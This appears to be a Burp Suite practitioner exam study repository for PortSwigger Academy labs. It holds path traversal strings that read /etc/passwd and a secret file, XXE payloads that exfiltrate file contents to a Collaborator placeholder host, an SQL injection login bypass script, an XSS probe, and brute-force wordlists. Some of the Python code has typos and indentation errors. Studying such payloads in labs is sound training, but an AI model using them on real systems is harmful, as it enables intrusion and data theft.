├── images
    ├── jwt.png
    ├── brute.png
    ├── csrf.png
    ├── gpost.png
    ├── ssrf.png
    ├── xss1.png
    ├── xss2.png
    ├── dom-xss.png
    ├── xinclude.png
    ├── dom-invader.png
    ├── exploit.dtd.png
    ├── get-dom-xss.png
    ├── hackvertor.png
    ├── manual-sqli.png
    ├── tracking.js.png
    ├── x-cache-hit.png
    ├── csrf-privesc.png
    ├── erb-template.png
    ├── identify-ssti.png
    ├── identify-xxe.png
    ├── referer-csrf.png
    ├── django-template.png
    ├── proto-pollution.png
    ├── ssrf-obfuscated.png
    ├── tornado-template.png
    ├── Routing-based-SSRF.png
    ├── identify-ssrf-host.png
    ├── single-connection.png
    ├── ssrf_redirect_uris.png
    ├── xxe-ssrf-localhost.png
    ├── admin-roleid-privesc.png
    ├── blind-xxe-exploit-dtd.png
    ├── domxss-on-constructor.png
    ├── encode-path-traverse.png
    ├── freemarker-template.png
    ├── handlebars-template.png
    ├── stored-xss-blog-post.png
    ├── xml-sql-obfuscation.png
    ├── identify-sqli-parameter.png
    ├── sqlmap-dump-table-data.png
    ├── TE-CL-http-request-smuggle.png
    ├── exploit-host-tracking-js.png
    ├── intruder-payload-positions.png
    ├── javascript-template-string.png
    ├── identify-math-evaluated-xml.png
    ├── dom-invader-resend-web-messages.png
    ├── scan-defined-insertion-points.png
    ├── HOST-Header-forgot-password-reset.PNG
    ├── collaborator-xss-Request-received.png
    ├── dom-invader-identify-web-messages.png
    ├── user-agent-cookie-stealer-smuggled.PNG
    ├── victim-request-captured-blog-comment.png
    ├── content-length-capture-victim-request.png
    ├── reflected-dom-xss-json-cookie-stealer.png
    └── deliver-reflected-xss-to-steal-victim-cookie.png
├── payloads
    ├── README.md
    ├── file-path-traversal.md
    ├── xxe-payloads.md
    └── CookieStealer-Payloads.md
├── python
    ├── template.py
    ├── README.md
    ├── xss
    │   └── xss1.py
    ├── utils
    │   ├── blog.py
    │   ├── utils.py
    │   ├── site.py
    │   └── shop.py
    └── sqli
    │   └── sqli_login_bypass.py
├── wordlists
    ├── burp-usernames.txt
    └── burp-passwords.txt
└── README.md


/images/jwt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/jwt.png


--------------------------------------------------------------------------------
/images/brute.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/brute.png


--------------------------------------------------------------------------------
/images/csrf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/csrf.png


--------------------------------------------------------------------------------
/images/gpost.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/gpost.png


--------------------------------------------------------------------------------
/images/ssrf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/ssrf.png


--------------------------------------------------------------------------------
/images/xss1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/xss1.png


--------------------------------------------------------------------------------
/images/xss2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/xss2.png


--------------------------------------------------------------------------------
/images/dom-xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/dom-xss.png


--------------------------------------------------------------------------------
/images/xinclude.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/xinclude.png


--------------------------------------------------------------------------------
/images/dom-invader.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/dom-invader.png


--------------------------------------------------------------------------------
/images/exploit.dtd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/exploit.dtd.png


--------------------------------------------------------------------------------
/images/get-dom-xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/get-dom-xss.png


--------------------------------------------------------------------------------
/images/hackvertor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/hackvertor.png


--------------------------------------------------------------------------------
/images/manual-sqli.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/manual-sqli.png


--------------------------------------------------------------------------------
/images/tracking.js.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/tracking.js.png


--------------------------------------------------------------------------------
/images/x-cache-hit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/x-cache-hit.png


--------------------------------------------------------------------------------
/images/csrf-privesc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/csrf-privesc.png


--------------------------------------------------------------------------------
/images/erb-template.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/erb-template.png


--------------------------------------------------------------------------------
/images/identify-ssti.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/identify-ssti.png


--------------------------------------------------------------------------------
/images/identify-xxe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/identify-xxe.png


--------------------------------------------------------------------------------
/images/referer-csrf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/referer-csrf.png


--------------------------------------------------------------------------------
/images/django-template.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/django-template.png


--------------------------------------------------------------------------------
/images/proto-pollution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/proto-pollution.png


--------------------------------------------------------------------------------
/images/ssrf-obfuscated.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/ssrf-obfuscated.png


--------------------------------------------------------------------------------
/images/tornado-template.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/tornado-template.png


--------------------------------------------------------------------------------
/images/Routing-based-SSRF.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/Routing-based-SSRF.png


--------------------------------------------------------------------------------
/images/identify-ssrf-host.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/identify-ssrf-host.png


--------------------------------------------------------------------------------
/images/single-connection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/single-connection.png


--------------------------------------------------------------------------------
/images/ssrf_redirect_uris.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/ssrf_redirect_uris.png


--------------------------------------------------------------------------------
/images/xxe-ssrf-localhost.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/xxe-ssrf-localhost.png


--------------------------------------------------------------------------------
/images/admin-roleid-privesc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/admin-roleid-privesc.png


--------------------------------------------------------------------------------
/images/blind-xxe-exploit-dtd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/blind-xxe-exploit-dtd.png


--------------------------------------------------------------------------------
/images/domxss-on-constructor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/domxss-on-constructor.png


--------------------------------------------------------------------------------
/images/encode-path-traverse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/encode-path-traverse.png


--------------------------------------------------------------------------------
/images/freemarker-template.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/freemarker-template.png


--------------------------------------------------------------------------------
/images/handlebars-template.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/handlebars-template.png


--------------------------------------------------------------------------------
/images/stored-xss-blog-post.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/stored-xss-blog-post.png


--------------------------------------------------------------------------------
/images/xml-sql-obfuscation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/xml-sql-obfuscation.png


--------------------------------------------------------------------------------
/images/identify-sqli-parameter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/identify-sqli-parameter.png


--------------------------------------------------------------------------------
/images/sqlmap-dump-table-data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/sqlmap-dump-table-data.png


--------------------------------------------------------------------------------
/images/TE-CL-http-request-smuggle.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/TE-CL-http-request-smuggle.png


--------------------------------------------------------------------------------
/images/exploit-host-tracking-js.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/exploit-host-tracking-js.png


--------------------------------------------------------------------------------
/images/intruder-payload-positions.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/intruder-payload-positions.png


--------------------------------------------------------------------------------
/images/javascript-template-string.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/javascript-template-string.png


--------------------------------------------------------------------------------
/images/identify-math-evaluated-xml.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/identify-math-evaluated-xml.png


--------------------------------------------------------------------------------
/images/dom-invader-resend-web-messages.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/dom-invader-resend-web-messages.png


--------------------------------------------------------------------------------
/images/scan-defined-insertion-points.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/scan-defined-insertion-points.png


--------------------------------------------------------------------------------
/images/HOST-Header-forgot-password-reset.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/HOST-Header-forgot-password-reset.PNG


--------------------------------------------------------------------------------
/images/collaborator-xss-Request-received.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/collaborator-xss-Request-received.png


--------------------------------------------------------------------------------
/images/dom-invader-identify-web-messages.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/dom-invader-identify-web-messages.png


--------------------------------------------------------------------------------
/images/user-agent-cookie-stealer-smuggled.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/user-agent-cookie-stealer-smuggled.PNG


--------------------------------------------------------------------------------
/images/victim-request-captured-blog-comment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/victim-request-captured-blog-comment.png


--------------------------------------------------------------------------------
/images/content-length-capture-victim-request.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/content-length-capture-victim-request.png


--------------------------------------------------------------------------------
/images/reflected-dom-xss-json-cookie-stealer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/reflected-dom-xss-json-cookie-stealer.png


--------------------------------------------------------------------------------
/images/deliver-reflected-xss-to-steal-victim-cookie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tib3rius/Burp-Suite-Certified-Practitioner-Exam-Study/HEAD/images/deliver-reflected-xss-to-steal-victim-cookie.png


--------------------------------------------------------------------------------
/payloads/README.md:
--------------------------------------------------------------------------------
1 | # Sample Payloads  
2 | 
3 | >The following are the sample payloads for various vulnerabilities.  
4 | 
5 | [CookieStealer XSS Payloads](CookieStealer-Payloads.md)  
6 | [XXE Payloads](xxe-payloads.md)  
7 | [File Path Traversal](file-path-traversal.md)  
8 |   
9 | 


--------------------------------------------------------------------------------
/python/template.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import logging
 3 | import argparse
 4 | import urllib3
 5 | 
 6 | import requests
 7 | 
 8 | import utils    # script written by @tjc_  https://youtu.be/YYsZpJ83azQ
 9 | 
10 | 
11 | log = logging.getLogger(__name__)
12 | logging.basicConfig(
13 |     stream=sys.stdout,
14 |     level=logging.INFO,
15 |     format="{asctime} [{threadName}][{levelname}][{name}] {message}",
16 |     style="{",
17 |     datefmt="%H:%M:%S",
18 | )
19 | urllib3.disable_warnings(urllib3.execeptions.InsecureRequestWarning)
20 | 
21 | 
22 | def main(args):
23 |     pass
24 |     
25 |     
26 | if __name__ == "__main__":
27 |     args = utils.parse_args(sys.argv)
28 |     main(args)


--------------------------------------------------------------------------------
/python/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # PortSwigger Academy Lab automation scripts
 3 | 
 4 | >Came across this great YouTube channel by [@tjc_](https://www.youtube.com/@tjc_/videos), where he step through the process of writng python scripts to automate the exploitation of the PortSwigger labs.  
 5 |   
 6 | >I followed his videos and reproduced the scripts but credit goes to **@tjc_**  
 7 | 
 8 | >The utils and other pythons scripts imported into each vulnerability catagory lab is reference with symbolic link, under each sub folder. In below example in the XSS folder there is symbolic link to ../utils folder.
 9 | 
10 | ```bash
11 | cd xss/
12 | ln -s ../utils utils
13 | ```  
14 | 
15 | >This create uniform import standard in all scripts.  
16 | 


--------------------------------------------------------------------------------
/payloads/file-path-traversal.md:
--------------------------------------------------------------------------------
 1 | # Directory Path Traversal  
 2 | 
 3 | ```bash
 4 | 
 5 | /etc/passwd
 6 | 
 7 | ../../../etc/passwd%00.png
 8 | 
 9 | ....//....//....//etc/passwd
10 | 
11 | ..%252f..%252f..%252fetc/passwd
12 | 
13 | /var/www/images/../../../etc/passwd
14 | 
15 | ../../../etc/passwd%00.png
16 | 
17 | ../../../etc/passwd
18 | 
19 | /home/carlos/secret
20 | 
21 | ../../../home/carlos/secret%00.png
22 | 
23 | ....//....//....//home/carlos/secret
24 | 
25 | ....//....//....//....//home/carlos/secret
26 | 
27 | ..%252f..%252f..%252fhome/carlos/secret
28 | 
29 | %252e%252e%252fhome%252fcarlos%252fsecret
30 | 
31 | /var/www/images/../../../home/carlos/secret
32 | 
33 | ../../../home/carlos/secret%00.png
34 | 
35 | ../../../home/carlos/secret
36 | 
37 | ```
38 | 
39 | 


--------------------------------------------------------------------------------
/python/xss/xss1.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import logging
 3 | import argparse
 4 | import urllib3
 5 | 
 6 | import requests
 7 | 
 8 | from utils import utils   # script written by @tjc_  https://youtu.be/YYsZpJ83azQ
 9 | from utils.blog import Blog
10 | 
11 | 
12 | log = logging.getLogger(__name__)
13 | logging.basicConfig(
14 |     stream=sys.stdout,
15 |     level=logging.INFO,
16 |     format="{asctime} [{threadName}][{levelname}][{name}] {message}",
17 |     style="{",
18 |     datefmt="%H:%M:%S",
19 | )
20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
21 | 
22 | 
23 | 
24 | def main(args):
25 | 	blog = Blog(args.url, args.no_proxy)
26 | 	blog.search("<script>alert(1)</script>")
27 | 	# print(resp.text) ## debugging
28 | 	blog.is_solved()
29 | 	
30 | 	
31 | if __name__ == "__main__":
32 |     args = utils.parse_args(sys.argv)
33 |     main(args)
34 | 


--------------------------------------------------------------------------------
/python/utils/blog.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import sys
 3 | import logging
 4 | import urllib3
 5 | 
 6 | import requests
 7 | 
 8 | from utils import utils   ## the original code written by @tjc_  https://youtu.be/HsHLc6U0IwQ?t=443  
 9 | from utils.site import Site
10 | 
11 | 
12 | log = logging.getLogger(__name__)
13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
14 | 
15 | 
16 | class Blog(Site):
17 | 	def __init__(self, url, no_proxy, session=None):     #  part of arguments given is 'self' automatically included
18 | 		super().__init__(url, no_proxy, session)
19 | 					
20 | 	def search(self, search_term):
21 | 		url = self.base_url + '?search=' + search_term
22 | 		log.info(f"Searching url: {url}")
23 | 		if self.no_proxy:
24 | 			resp = requestis.get(url)
25 | 		else:
26 | 			resp = requests.get(url, proxies=utils.PROXIES, verify=False)
27 | 		return resp
28 | 


--------------------------------------------------------------------------------
/python/sqli/sqli_login_bypass.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import logging
 3 | import urllib3
 4 | 
 5 | import requests
 6 | 
 7 | import utils            # code to this script was written by @tjc_  https://youtu.be/YYsZpJ83azQ
 8 | from shop import Shop   # Shop class also written by @tjc_ 
 9 | 
10 | log = logging.getLogger(__name__)
11 | logging.basicConfig(
12 |     stream=sys.stdout,
13 |     level=logging.INFO,
14 |     format="{asctime} [{threadName}][{levelname}][{name}] {message}",
15 |     style="{",
16 |     datefmt="%H:%M:%S",
17 | )
18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
19 | 
20 | 
21 | def main(args):
22 |     session = requests.Session()  # keep track of cookies 
23 |     shop = Shop(args.url, args.no_proxy, session)  # login url build into the Class and this object 
24 |     shop.login("administrator'--","password")
25 |     utils.is_solved(shop.base_url, args.no_proxy)
26 | 
27 | 
28 | if __name__ == "__main__":
29 |     args = utils.parse_args(sys.argv)
30 |     main(args)
31 | 


--------------------------------------------------------------------------------
/python/utils/utils.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import time
 3 | import logging
 4 | import argparse
 5 | import urllib3
 6 | 
 7 | import requests  #  this script to automate portswigger labs was written by $tjc_  https://youtu.be/YYsZpJ83azQ  
 8 | 
 9 | 
10 | PROXIES = {
11 |     "http": "127.0.0.1:8080",
12 |     "https":"127.0.0.1:8080"
13 | }
14 | log = logging.getLogger(__name__)
15 | logging.basicConfig(
16 |     stream=sys.stdout,
17 |     level=logging.INFO,
18 |     format="{asctime} [{threadName}][{levelname}][{name}] {message}",
19 |     style="{",
20 |     datefmt="%H:%M:%S",
21 | )
22 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
23 | 
24 | def parse_args(args: list):
25 |     parser = argparse.ArgumentParser()
26 |     parser.add_argument(
27 |         "-n", "--no-proxy", default=False, action="store_true", help="do not use proxy"
28 |     )
29 |     parser.add_argument("url", help="url of target")
30 |     return parser.parse_args()
31 | 
32 | 
33 | def normalize_url(url):
34 |     if not url.endswith("/"):
35 |         url = url + "/"
36 |     return url
37 |     
38 | 


--------------------------------------------------------------------------------
/wordlists/burp-usernames.txt:
--------------------------------------------------------------------------------
  1 | carlos
  2 | root
  3 | admin
  4 | test
  5 | guest
  6 | info
  7 | adm
  8 | mysql
  9 | user
 10 | administrator
 11 | oracle
 12 | ftp
 13 | pi
 14 | puppet
 15 | peter
 16 | wiener
 17 | C0nt3ntM4n4g3r
 18 | ansible
 19 | ec2-user
 20 | vagrant
 21 | azureuser
 22 | academico
 23 | acceso
 24 | access
 25 | accounting
 26 | accounts
 27 | acid
 28 | activestat
 29 | ad
 30 | adam
 31 | adkit
 32 | admin
 33 | administracion
 34 | administrador
 35 | administrator
 36 | administrators
 37 | admins
 38 | ads
 39 | adserver
 40 | adsl
 41 | ae
 42 | af
 43 | affiliate
 44 | affiliates
 45 | afiliados
 46 | ag
 47 | agenda
 48 | agent
 49 | ai
 50 | aix
 51 | ajax
 52 | ak
 53 | akamai
 54 | al
 55 | alabama
 56 | alaska
 57 | albuquerque
 58 | alerts
 59 | alpha
 60 | alterwind
 61 | am
 62 | amarillo
 63 | americas
 64 | an
 65 | anaheim
 66 | analyzer
 67 | announce
 68 | announcements
 69 | antivirus
 70 | ao
 71 | ap
 72 | apache
 73 | apollo
 74 | app
 75 | app01
 76 | app1
 77 | apple
 78 | application
 79 | applications
 80 | apps
 81 | appserver
 82 | aq
 83 | ar
 84 | archie
 85 | arcsight
 86 | argentina
 87 | arizona
 88 | arkansas
 89 | arlington
 90 | as
 91 | as400
 92 | asia
 93 | asterix
 94 | at
 95 | athena
 96 | atlanta
 97 | atlas
 98 | att
 99 | au
100 | auction
101 | austin
102 | auth
103 | auto
104 | autodiscover


--------------------------------------------------------------------------------
/wordlists/burp-passwords.txt:
--------------------------------------------------------------------------------
  1 | C0nt3ntM4n4g3r
  2 | peter
  3 | wiener
  4 | 123456
  5 | password
  6 | 12345678
  7 | qwerty
  8 | 123456789
  9 | 12345
 10 | admin
 11 | administrator
 12 | cheat
 13 | 1234
 14 | 111111
 15 | 1234567
 16 | dragon
 17 | 123123
 18 | baseball
 19 | abc123
 20 | football
 21 | monkey
 22 | letmein
 23 | content
 24 | shadow
 25 | master
 26 | 666666
 27 | qwertyuiop
 28 | 123321
 29 | mustang
 30 | 1234567890
 31 | michael
 32 | 654321
 33 | superman
 34 | 1qaz2wsx
 35 | 7777777
 36 | 121212
 37 | 000000
 38 | qazwsx
 39 | 123qwe
 40 | killer
 41 | trustno1
 42 | jordan
 43 | jennifer
 44 | zxcvbnm
 45 | asdfgh
 46 | hunter
 47 | buster
 48 | soccer
 49 | harley
 50 | batman
 51 | andrew
 52 | tigger
 53 | sunshine
 54 | iloveyou
 55 | 2000
 56 | charlie
 57 | robert
 58 | thomas
 59 | hockey
 60 | ranger
 61 | daniel
 62 | starwars
 63 | klaster
 64 | 112233
 65 | george
 66 | computer
 67 | michelle
 68 | jessica
 69 | pepper
 70 | 1111
 71 | zxcvbn
 72 | 555555
 73 | 11111111
 74 | 131313
 75 | freedom
 76 | 777777
 77 | pass
 78 | maggie
 79 | 159753
 80 | aaaaaa
 81 | ginger
 82 | princess
 83 | joshua
 84 | cheese
 85 | amanda
 86 | summer
 87 | love
 88 | ashley
 89 | nicole
 90 | chelsea
 91 | biteme
 92 | matthew
 93 | access
 94 | yankees
 95 | 987654321
 96 | dallas
 97 | austin
 98 | thunder
 99 | taylor
100 | matrix
101 | mobilemail
102 | mom
103 | monitor
104 | monitoring
105 | montana
106 | moon
107 | moscow


--------------------------------------------------------------------------------
/python/utils/site.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import time
 3 | import logging
 4 | import urllib3
 5 | 
 6 | import requests
 7 | 
 8 | from utils import utils		# source of the code https://youtu.be/HsHLc6U0IwQ?t=443
 9 | 
10 | 
11 | log = logging.getLogger(__name__)
12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
13 | 
14 | 
15 | class Site:
16 |     def __init__(self, url, no_proxy, session=None):
17 |         self.base_url = utils.normalize_url(url)
18 |         self.no_proxy = no_proxy
19 |         self.session = session
20 | 	
21 |     def get_hint(self):
22 |     	log.info("Get Hint")
23 |     	if self.no_proxy:
24 |     		resp = requests.get(self.base_url)
25 |     	else:
26 |     		resp = requests.get(self.base_url, proxies=utils.PROXIES, verify=False)
27 |     	pattern = re.compile(r'id="hint">.*?: \'(.*?)\'')
28 |     	m = pattern.search(resp.text)
29 |     	log.info(f"Found hint: {m[1]}")
30 |     	return m[1]
31 |     	
32 |     def is_solved(self):
33 |         def _is_solved(self):
34 |             log.info("Checking if Lab is solved?")
35 |             if self.no_proxy:
36 |                 resp = requests.get(self.base_url)
37 |             else:
38 |                 resp = requests.get(self.base_url, proxies=utils.PROXIES, verify=False)
39 |             if "Congratulations, you solved the lab!" in resp.text:
40 |                 log.info("Lab Completed.")
41 |                 return True
42 |                 
43 |         solved = _is_solved(self)
44 |         if solved:
45 |             return True
46 |         else:
47 |             time.sleep(2)
48 |             _is_solved(self)
49 | 


--------------------------------------------------------------------------------
/payloads/xxe-payloads.md:
--------------------------------------------------------------------------------
 1 | # XML Injection Payloads
 2 | 
 3 | ```xml
 4 | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-acb71f8a1f9d338ac05d9ab201550061.web-security-academy.net/exploit"> %xxe;]>
 5 | ```
 6 | 
 7 | ```xml
 8 | <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
 9 | &xxe;
10 | ```
11 | 
12 | ```xml
13 | <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
14 | ```
15 | 
16 | ```xml
17 | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
18 | ```
19 | 
20 | ```xml
21 | <!ENTITY % file SYSTEM "file:///etc/hostname">
22 | <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
23 | %eval;
24 | %exfil;
25 | ```
26 | 
27 | ```xml
28 | <!ENTITY % file SYSTEM "file:///etc/passwd">
29 | <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
30 | %eval;
31 | %exfil;
32 | ```
33 | 
34 | ```xml
35 | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-acb71f8a1f9d338ac05d9ab201550061.web-security-academy.net/exploit"> %xxe;]>
36 | ```
37 | 
38 | ```xml
39 | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
40 | ```
41 | 
42 | ```xml
43 | <data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>
44 | ```  
45 | 
46 | ```xml
47 | <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
48 | ```
49 | 
50 | ```xml
51 | <!ENTITY % file SYSTEM "file:///etc/hostname">
52 | <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
53 | %eval;
54 | %exfil;
55 | ```
56 | 
57 | ```xml
58 | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
59 | ```  
60 | 
61 | 


--------------------------------------------------------------------------------
/python/utils/shop.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import sys
 3 | import logging
 4 | 
 5 | import requests
 6 | 
 7 | from utils import utils   # this script was created from YouTube https://youtu.be/YYsZpJ83azQ tutorial by @tjc_   
 8 | from utils.site import Site
 9 | 
10 | 
11 | log = logging.getLogger(__name__)
12 | 
13 | 
14 | class Shop(Site):
15 |     def __init__(self, url, no_proxy, session=None):   #  part of arguments given is 'self' automatically included
16 |     	super().__init__(url, no_proxy, session)
17 |         self.login_url = self.base_url + "login"
18 |         self.category_url = self.base_url + "filter?category="
19 | 
20 |     def login(self, username, password):
21 |         log.info("Login Attempt to shop")
22 |         if self.no_proxy:
23 |             resp = self.session.get(self.login_url)
24 |         else:
25 |             resp = self.session.get(self.login_url, proxies=utils.PROXIES, verify=False)
26 |         if not resp.status_code == 200:
27 |             log.error("Could not get login page. Exit Program!")
28 |             sys.exit()
29 |         else:
30 |             # print(resp.text) # debugging 
31 |             pattern = re.compile(r'name="csrf" value="(.*?)"')
32 |             m = pattern.search(resp.text)
33 |             csrf_token = m[1]
34 |             log.info("Found CSRF token: {csrf_token}")
